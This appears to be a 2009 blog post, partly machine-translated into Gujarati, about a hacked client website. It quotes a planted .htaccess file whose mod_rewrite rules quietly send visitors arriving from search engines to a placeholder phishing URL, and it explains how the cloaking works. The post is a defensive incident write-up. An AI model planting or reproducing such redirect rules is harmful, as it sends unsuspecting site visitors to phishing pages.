ગુરુવાર, જાન્યુઆરી 22, 2009 | લેખક:

હું ખૂબ જ તાજેતરમાં કારણે ક્લાઈન્ટ વેબ સાઇટ સાથે સમસ્યા જોવા મળે છે .htaccess મા નિર્ધારિત ફાઈલ. સાઇટ પર હોસ્ટ કરવામાં આવ્યું હતું વિન્ડોઝ સર્વર ચાલી IIS મદદથી IISPassword, જે ઉપયોગ કરે છે .htaccess મા નિર્ધારિત તેની સેટિંગ્સ માટે ફાઇલો.

IISPassword સાથે બરાબર એ જ નિયમો પાલન કરતા નથી અપાચે તેમ છતાં. જો htaccess મા નિર્ધારિત ફાઇલ તે અસ્તિત્વમાં જોઈએ IISPassword યોગ્ય નિયમો સમાવી, અન્યથા સર્વર માત્ર નીચેના ભૂલ આપે:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

અલબત્ત, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

શેર
You can follow any responses to this entry through the આરએસએસ 2.0 feed. You can leave a response, અથવા trackback from your own site.
Leave a Reply » લૉગ ઇન કરો